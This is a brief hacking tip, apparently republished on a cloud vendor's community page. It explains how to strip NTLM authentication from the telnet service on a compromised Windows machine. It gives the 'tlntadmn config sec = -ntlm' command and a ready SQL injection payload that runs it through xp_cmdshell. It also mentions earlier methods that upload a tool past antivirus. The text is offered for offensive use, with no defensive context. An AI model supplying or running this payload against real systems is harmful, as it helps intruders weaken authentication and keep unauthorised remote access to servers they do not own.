Run commands in telnet to remove ntlm Authentication

Source: Internet
Author: User

 

I believe everyone is familiar with telnet. Hacking often uses built-in shell, especially injection, but ntlm authentication is the most annoying. In the past, there were two methods for removing ntlm.

1. Uploading ntml.exe has many disadvantages. For example, if the other party has anti-virus software, many network segments shield TFTP.

2. directly write the telnet configuration information to the text and execute it using shell. This method is very troublesome.

Today, I will introduce you to the methods I have been using.

That is, run the command directly:

       
        tlntadmn config sec = -ntlm
       

For injection, run the following command:

       
        ;exec master.dbo.xp_cmdshell tlntadmn config sec = -ntlm--
       

Ntlm authentication is removed after running.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.